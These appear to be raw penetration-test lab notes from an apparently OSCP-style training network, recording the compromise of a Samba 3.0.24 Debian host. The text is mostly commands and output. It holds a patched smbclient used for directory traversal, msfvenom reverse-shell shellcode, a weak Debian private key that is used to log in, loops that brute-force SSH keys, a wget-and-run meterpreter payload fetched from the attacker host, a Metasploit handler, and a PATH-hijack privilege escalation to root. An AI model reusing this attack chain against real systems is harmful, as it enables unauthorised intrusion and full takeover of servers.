-- 10.11.1.136 --

root@7242-alpha-reticuli:~# nmap -e tap0 -sC -sV --script "(not intrusive) and smb-*" -p 139,445 10.11.1.136
Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-06 14:33 CDT
Nmap scan report for 10.11.1.136
Host is up (0.045s latency).

PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: LOCAL)
445/tcp open  netbios-ssn Samba smbd 3.0.24 (workgroup: LOCAL)
MAC Address: 00:50:56:89:5F:D5 (VMware)

Host script results:
| smb-mbenum: 
|   DFS Root
|     SUFFERANCE  0.0  sufferance debian server
|   Master Browser
|     SUFFERANCE  0.0  sufferance debian server
|   Print server
|     SUFFERANCE  0.0  sufferance debian server
|   Server
|     SUFFERANCE  0.0  sufferance debian server
|   Server service
|     SUFFERANCE  0.0  sufferance debian server
|   Unix server
|     SUFFERANCE  0.0  sufferance debian server
|   Windows NT/2000/XP/2003 server
|     SUFFERANCE  0.0  sufferance debian server
|   Workstation
|_    SUFFERANCE  0.0  sufferance debian server
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.24)
|   NetBIOS computer name: 
|   Workgroup: THINC.LOCAL\x00
|_  System time: 2018-04-06T15:33:55-04:00
| smb-protocols: 
|   dialects: 
|_    NT LM 0.12 (SMBv1) [dangerous, but default]
| smb-security-mode: 
|   account_used: guest
|   authentication_level: share (dangerous)
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.43 seconds
root@7242-alpha-reticuli:~# 


wget -c https://download.samba.org/pub/samba/samba-3.4.17.tar.gz
https://packetstormsecurity.com/files/85957/Samba-Remote-Directory-Traversal.html

Nodify client.c source and commpile 
Patch created --

root@7242-alpha-reticuli:~/Downloads/samba-3.4.17/source3/client# diff -u client.c.orig client.c > client.patch
root@7242-alpha-reticuli:~/Downloads/samba-3.4.17/source3/client# cat client.patch 
--- client.c.orig	2012-04-28 12:01:42.000000000 -0500
+++ client.c	2018-04-06 15:38:19.388547487 -0500
@@ -2754,15 +2754,13 @@
 		return 1;
 	}
 	oldname = talloc_asprintf(ctx,
-			"%s%s",
-			client_get_cur_dir(),
+			"%s",
 			buf);
 	if (!oldname) {
 		return 1;
 	}
 	newname = talloc_asprintf(ctx,
-			"%s%s",
-			client_get_cur_dir(),
+			"%s",
 			buf2);
 	if (!newname) {
 		return 1;
root@7242-alpha-reticuli:~/Downloads/samba-3.4.17/source3/client# 

Export LD Path --
root@7242-alpha-reticuli:~/Downloads/samba-3.4.17/source3/bin# LD_LIBRARY_PATH=/root/Downloads/samba-3.4.17/source3/bin
root@7242-alpha-reticuli:~/Downloads/samba-3.4.17/source3/bin# export LD_LIBRARY_PATH
root@7242-alpha-reticuli:~/Downloads/samba-3.4.17/source3/bin# echo $LD_LIBRARY_PATH
/root/Downloads/samba-3.4.17/source3/bin
root@7242-alpha-reticuli:~/Downloads/samba-3.4.17/source3/bin# 

Let's try this bitch and see if we can symlink some shit. 
Highjack keys / Insert keys etc... We want a shell... Root would be nice !

root@7242-alpha-reticuli:~/Downloads/samba-3.4.17/source3/bin# ./smbclient -s /root/Downloads/smb.conf -U bob //10.11.1.136/"Bob Share"
creating lame upcase table
creating lame lowcase table
Enter bob's password: 
Domain=[THINC.LOCAL] OS=[Unix] Server=[Samba 3.0.24]
Server not using user level security and no password supplied.
smb: \>  l
  .                                   D        0  Thu Apr  5 17:32:18 2018
  ..                                  D        0  Sat Jan 29 12:07:11 2011
  Contract Mr. Suzuki.txt             A        0  Thu Oct  9 17:55:56 2008
  kwh                                 D        0  Wed Aug 26 04:54:18 2009
  tobesecured                         D        0  Tue Oct  7 18:39:22 2008
  Draft Contract Mr. Yamamoto.txt      A       28  Thu Jan  7 20:02:12 2016
  rootfs                              D        0  Wed Aug 26 04:54:18 2009

		61335 blocks of size 131072. 50339 blocks available
smb: \> 

Symlink to / works but pretty much userless.
installed samaba-bgd ( debugging symbols )
setup : https://download.samba.org/pub/samba/stable/samba-3.0.24.tar.gz

Remote exploit: https://download.samba.org/pub/samba/stable/samba-3.0.24.tar.gz
Will create custom entry:

	{
		"name"               : "target_finder (hardcode correct system addr)", 
		"chunk_offset"       : 0, 
		"system_libc_offset" : 0xb6d1a3c0, 
		"finder": True
	}

debian4:~# gdb /usr/sbin/smbd `ps auwx | grep smbd | grep -v grep | head -n1 | awk '{ print $2 }'` <<< `echo -e "print system"` | grep '$1'
Failed to read a valid object file image from memory.
(gdb) $1 = {<text variable, no debug info>} 0xb7d62ac0 <system>
debian4:~# 

system_libc_offset = 0xb7d62ac0

Exploit --
root@7242-alpha-reticuli:/home/cdowns/Security# python 52973.py 10.11.1.136 139 10.11.0.203 4444 02
{+} TRYING EIP=0xb7d62ac0 OFFSET=0x0000010c

Dont work !!! Tested on local installation. Fucker.

Ok... Next --
https://packetstormsecurity.com/files/142782/NAsamba.pl.txt
https://khalil-shreateh.com/khalil.shtml/index.php/it-highlights/7993-Samba-is-known-pipename---Code-Execution--.html

13:42:05-cdowns@7242-alpha-reticuli:~/Security$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.203 LPORT=4445 -f c
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 68 bytes
Final size of c file: 311 bytes
unsigned char buf[] = 
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x0a\x0b\x00\xcb\x68"
"\x02\x00\x11\x5d\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"
"\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"
"\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
13:42:25-cdowns@7242-alpha-reticuli:~/Security$


Recreated / symlink rootfs --
Upload bogus id_rsa.pub passwordless --
Attempt to get it somewhere useful --

21:00:12-cdowns@7242-alpha-reticuli:/tmp$ smbclient //10.11.1.136/"Bob Share" -U bob -c 'put "id_rsa.pub"'
Enter WORKGROUP\bob's password: 
putting file id_rsa.pub as \id_rsa.pub (3.6 kb/s) (average 3.6 kb/s)
21:01:00-cdowns@7242-alpha-reticuli:/tmp$ smbclient //10.11.1.136/"Bob Share" 
Enter WORKGROUP\cdowns's password: 
Try "help" to get a list of possible commands.
smb: \> l
  .                                   D        0  Sun Apr  8 21:00:59 2018
  ..                                  D        0  Sat Jan 29 12:07:11 2011
  Contract Mr. Suzuki.txt             A        0  Thu Oct  9 17:55:56 2008
  tobesecured                         D        0  Tue Oct  7 18:39:22 2008
  Draft Contract Mr. Yamamoto.txt      A       28  Thu Jan  7 20:02:12 2016
  id_rsa.pub                          A      408  Sun Apr  8 21:00:59 2018
  rootfs                              D        0  Wed Aug 26 04:54:18 2009

		7850996 blocks of size 1024. 6440308 blocks available
smb: \>

smb: \rootfs\var\backups\ssh\> l
  .                                   D        0  Thu Jan  7 19:59:36 2016
  ..                                  D        0  Thu Jan  7 19:59:36 2016
  authorized_keys                     N      609  Thu Jan  7 19:59:36 2016
  known_hosts                         N      442  Thu Jan  7 19:59:36 2016

		7850996 blocks of size 1024. 6438592 blocks available
smb: \rootfs\var\backups\ssh\> 

Hijacked keys --
Find match against known DB ( WE NEED A PRIVATE !! ) --
00:54:06-cdowns@7242-alpha-reticuli:/tmp$ ssh-keygen -l -f id_dsa.pub 
1024 SHA256:pazdjoHxCGr2tjH16FVEvuwUTtHte8xK1EJ2nmWSHx4 root@debian40server (DSA)
01:00:06-cdowns@7242-alpha-reticuli:/tmp$ cat known_host 
|1|g1XYsw4t6FzrZtpCBs3vRTksvqA=|2cnMAus+FLyAnLYb3GHn8tT4Nag= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAyjxjmvZVP9H18SAGDc/hMku0RzVqt6AQsTHjgxIm3EJosBzPPUK0jIdBKaT7wGy6FA+8ZJTGsHiu/+fZ2h02V6YMw3wxHH3FR9ZDwL0carHKovHLLg/4xbx/IF4ML6Wcyx5/oAqhk6BjV8CAmA+qItqcljM0m092GaZLSMz3CifBLHwNzRerfm9UJeK8QOviIu0n3NOmRb0Hdfy7BelJzfeIMlCTFXuQDdJ6vqJOJhxhlrQddu6+bMpFka1wN6Gd6/fI/5IxLX4FyIsr007NYI4jgbiY7uGCiQxv8FFGR1FcLBJEsFwtdf2grmx4XjpKsdoi00R2wAmMnuu6UPDPBQ==
01:03:04-cdowns@7242-alpha-reticuli:/tmp$ 

Verify Pub key is weak against debian-ssh DB --
FOUND IT !! --

13:35:59-cdowns@7242-alpha-reticuli:~/Security/debian-ssh/common_keys/dsa/1024$ grep -r "z4OF1M9tuzFAGALDMHJSx8U8Z11lsiuO4Owx11pAo8Ebq0sKNDd0GzvVQxE"
f1fb2162a02f0f7c40c210e6167f05ca-16858.pub:ssh-dss AAAAB3NzaC1kc3MAAACBAOgzzMCD3Im5bRnAVdV3yLwTsyNAi3IiFShIfx9bUcUNmyFDM7SaFrVBuuIW+2qnDF7vybPiMNI9/dQ7ck2gLUqPu2F4gfXml8W9RKcqTOVksRmQ5s0O4c88mCqV3F1nzKKMSZbK9yYWbafabX91f2SinBQZbfMGv8+R2TyE78LjAAAAFQDXtJ7Pca0RkEBFcBLfPzmCUBpSeQAAAIEAlK4NYlfGt3uInBaKG0kK/N0nZwX7ji++5xSiLLjI/0M9xacdWaZcPBZ4GretGGIhnYEPlBote8GlG1Ap7li39ATazIXJQguG+Mgun3de73RugX/oGsUt5oatCS2Lo9mfRBijlVYChLyQbgkZMwKziwR1BHUWE/jkCKT7bPEJvw8AAACBAJZHIWHJybvrIcs9oB5hTL/8r+C9gDx+R3vcEFQq58D/UDi5FWzA71IZfcOt2+EPabP77gB6Ad/nNy3BrqmkocwLX+Of1uwMhgD63UeE5fUOuIbW+z4OF1M9tuzFAGALDMHJSx8U8Z11lsiuO4Owx11pAo8Ebq0sKNDd0GzvVQxE root@targetcluster
14:23:48-cdowns@7242-alpha-reticuli:~/Security/debian-ssh/common_keys/dsa/1024$ cat f1fb2162a02f0f7c40c210e6167f05ca-16858
-----BEGIN DSA PRIVATE KEY-----
MIIBvAIBAAKBgQDoM8zAg9yJuW0ZwFXVd8i8E7MjQItyIhUoSH8fW1HFDZshQzO0
mha1QbriFvtqpwxe78mz4jDSPf3UO3JNoC1Kj7theIH15pfFvUSnKkzlZLEZkObN
DuHPPJgqldxdZ8yijEmWyvcmFm2n2m1/dX9kopwUGW3zBr/Pkdk8hO/C4wIVANe0
ns9xrRGQQEVwEt8/OYJQGlJ5AoGBAJSuDWJXxrd7iJwWihtJCvzdJ2cF+44vvucU
oiy4yP9DPcWnHVmmXDwWeBq3rRhiIZ2BD5QaLXvBpRtQKe5Yt/QE2syFyUILhvjI
Lp93Xu90boF/6BrFLeaGrQkti6PZn0QYo5VWAoS8kG4JGTMCs4sEdQR1FhP45Aik
+2zxCb8PAoGBAJZHIWHJybvrIcs9oB5hTL/8r+C9gDx+R3vcEFQq58D/UDi5FWzA
71IZfcOt2+EPabP77gB6Ad/nNy3BrqmkocwLX+Of1uwMhgD63UeE5fUOuIbW+z4O
F1M9tuzFAGALDMHJSx8U8Z11lsiuO4Owx11pAo8Ebq0sKNDd0GzvVQxEAhQ+WX2E
qrIkx3PbheK1PLs3X+wh5Q==
-----END DSA PRIVATE KEY-----
14:24:04-cdowns@7242-alpha-reticuli:~/Security/debian-ssh/common_keys/dsa/1024

Modify ssh_config --
Force PasswordAuthentication=no --

debian4:~/.ssh# cat /etc/ssh/ssh_config | grep GSSAPI
    GSSAPIAuthentication no 
    GSSAPIDelegateCredentials no
debian4:~/.ssh# ssh -p 22 -i id_dsa -o "PasswordAuthentication no" bob@10.11.1.136
Linux sufferance 2.6.30.5-ph33r #1 SMP Sat Aug 29 16:20:59 EDT 2009 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Apr 10 18:07:24 2018 from 10.11.0.203
bob@sufferance:~$ id
uid=1001(bob) gid=1001(bob) groups=1001(bob)
bob@sufferance:~$ 

TIME TO ROOT THIS PIG !!!!
-- Let it Rip !!!! --

debian4:/home/cdowns/debian-ssh/common_keys# for i in `ls dsa/1024/ | awk '{ print $NF }' | grep -v .pub` ; do ssh -p 22 -i dsa/1024/$i -o "PasswordAuthentication no" root@10.11.1.136 2>/dev/null ; done
debian4:~# cd /home/cdowns/debian-ssh/common_keys/
debian4:/home/cdowns/debian-ssh/common_keys# for i in `ls rsa/2048/ | awk '{ print $NF }' | grep -v .pub` ; do echo $i && ssh -p 22 -i rsa/2048/$i -o "PasswordAuthentication no" root@10.11.1.136 2>/dev/null ; done


--- debug1: An invalid name was supplied ---
--- A parameter was malformed ---
--- Validation error ---
http://realtechtalk.com/SSH_error_slow_login_debug1_An_invalid_name_was_supplied_Cannot_determine_realm_for_numeric_host_address_Solution-1251-articles

bob@sufferance:/var/tmp/rsa/2048$ for i in `ls | awk '{ print $NF }' | grep -v .pub` ; do echo $i && ssh -vv -p 22 -i $i -o "PasswordAuthentication no" -o "GSSAPIAuthentication no" root@127.0.0.1 ; done


0002d5af29276c95a49dc2ab3b506707-23747
00030d8fbf8ef4e6c7c878e5a3700192-29213
0004c120c8d0b5820c5d84d35e3c8d19-20980
00055066466fe1a24339bce3cc97f4fb-615
----- snip -----


NOTE:
Wasted WAY too much time trying to make sure sever keys matched etc.... Dumb dumb dumb.

bob@sufferance:/var/tmp$ find / -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null |xargs -r ls -la
-rw------- 1 bob  bob  609 2011-01-29 14:33 /home/bob/.ssh/authorized_keys
-rw-r--r-- 1 bob  bob  884 2018-04-15 00:43 /home/bob/.ssh/known_hosts
-rw-r--r-- 1 root root 609 2016-01-07 20:59 /var/backups/ssh/authorized_keys
-rw-r--r-- 1 root root 442 2016-01-07 20:59 /var/backups/ssh/known_hosts
bob@sufferance:/var/tmp$ cat /home/bob/.ssh/authorized_keys ; cat /var/backups/ssh/authorized_keys
ssh-dss AAAAB3NzaC1kc3MAAACBAOgzzMCD3Im5bRnAVdV3yLwTsyNAi3IiFShIfx9bUcUNmyFDM7SaFrVBuuIW+2qnDF7vybPiMNI9/dQ7ck2gLUqPu2F4gfXml8W9RKcqTOVksRmQ5s0O4c88mCqV3F1nzKKMSZbK9yYWbafabX91f2SinBQZbfMGv8+R2TyE78LjAAAAFQDXtJ7Pca0RkEBFcBLfPzmCUBpSeQAAAIEAlK4NYlfGt3uInBaKG0kK/N0nZwX7ji++5xSiLLjI/0M9xacdWaZcPBZ4GretGGIhnYEPlBote8GlG1Ap7li39ATazIXJQguG+Mgun3de73RugX/oGsUt5oatCS2Lo9mfRBijlVYChLyQbgkZMwKziwR1BHUWE/jkCKT7bPEJvw8AAACBAJZHIWHJybvrIcs9oB5hTL/8r+C9gDx+R3vcEFQq58D/UDi5FWzA71IZfcOt2+EPabP77gB6Ad/nNy3BrqmkocwLX+Of1uwMhgD63UeE5fUOuIbW+z4OF1M9tuzFAGALDMHJSx8U8Z11lsiuO4Owx11pAo8Ebq0sKNDd0GzvVQxE root@debian40server
ssh-dss AAAAB3NzaC1kc3MAAACBAOgzzMCD3Im5bRnAVdV3yLwTsyNAi3IiFShIfx9bUcUNmyFDM7SaFrVBuuIW+2qnDF7vybPiMNI9/dQ7ck2gLUqPu2F4gfXml8W9RKcqTOVksRmQ5s0O4c88mCqV3F1nzKKMSZbK9yYWbafabX91f2SinBQZbfMGv8+R2TyE78LjAAAAFQDXtJ7Pca0RkEBFcBLfPzmCUBpSeQAAAIEAlK4NYlfGt3uInBaKG0kK/N0nZwX7ji++5xSiLLjI/0M9xacdWaZcPBZ4GretGGIhnYEPlBote8GlG1Ap7li39ATazIXJQguG+Mgun3de73RugX/oGsUt5oatCS2Lo9mfRBijlVYChLyQbgkZMwKziwR1BHUWE/jkCKT7bPEJvw8AAACBAJZHIWHJybvrIcs9oB5hTL/8r+C9gDx+R3vcEFQq58D/UDi5FWzA71IZfcOt2+EPabP77gB6Ad/nNy3BrqmkocwLX+Of1uwMhgD63UeE5fUOuIbW+z4OF1M9tuzFAGALDMHJSx8U8Z11lsiuO4Owx11pAo8Ebq0sKNDd0GzvVQxE root@debian40server
bob@sufferance:/var/tmp$ 

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.11.0.203 LPORT=1337 -f elf > shell.elf
wget -q -c http://10.11.0.203:81/shell.elf ; chmod 755 ; ./shell.elf 

root@7242-alpha-reticuli:~# msfconsole -q -x "use exploit/multi/handler; set LHOST 10.11.0.203; set LPORT 1337; set PAYLOAD linux/x86/meterpreter/reverse_tcp; set ExitOnSession false ; exploit -j -z"
LHOST => 10.11.0.203
LPORT => 1337
PAYLOAD => linux/x86/meterpreter/reverse_tcp
ExitOnSession => false
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 10.11.0.203:1337 
msf exploit(multi/handler) > [*] Sending stage (857352 bytes) to 10.11.1.136
[*] Meterpreter session 1 opened (10.11.0.203:1337 -> 10.11.1.136:47951) at 2018-04-15 10:26:31 -0500

msf exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter > portfwd add -l 445 -p 445 -r 10.11.0.203
[*] Local TCP relay created: :445 <-> 10.11.0.203:445
meterpreter > background 
[*] Backgrounding session 1...
msf exploit(multi/handler) > use linux/samba/lsa_transnames_heap
msf exploit(linux/samba/lsa_transnames_heap) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(linux/samba/lsa_transnames_heap) > show options

Module options (exploit/linux/samba/lsa_transnames_heap):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    127.0.0.1        yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  LSARPC           yes       The pipe name to use


Exploit target:

   Id  Name
   --  ----
   0   Linux vsyscall


msf exploit(linux/samba/lsa_transnames_heap) > 



Remote compile --

cdowns@debian4:~$ cat shell.c 
#include<stdio.h>

int main(void) {
    setresuid(geteuid(), geteuid(), geteuid());
    system("/bin/sh");
    return 0;
}
cdowns@debian4:~$ gcc -m32 -Wall shell.c -o shell

----------------
!!!!! DONE !!!!!
----------------
bob@sufferance:~$ ls
files
bob@sufferance:~$ wget -q -c http://10.11.0.203:81/shell ; chmod 755 shell
bob@sufferance:~$ mv shell scp
bob@sufferance:~$ ls -l
total 12
drwxrwxrwt 3 root root 4096 2018-04-16 16:22 files
-rwxr-xr-x 1 bob  bob  7315 2018-04-16 22:07 scp
bob@sufferance:~$ ./scp 
sh-3.1$ exit
bob@sufferance:~$ echo $PATH
.:/usr/local/bin:/usr/bin:/bin:/usr/games
bob@sufferance:~$ uploadtosecure 
Archiving files to secure server...
sh-3.1# 


proof:
532519e703860f6e98f50f0e0272ac28


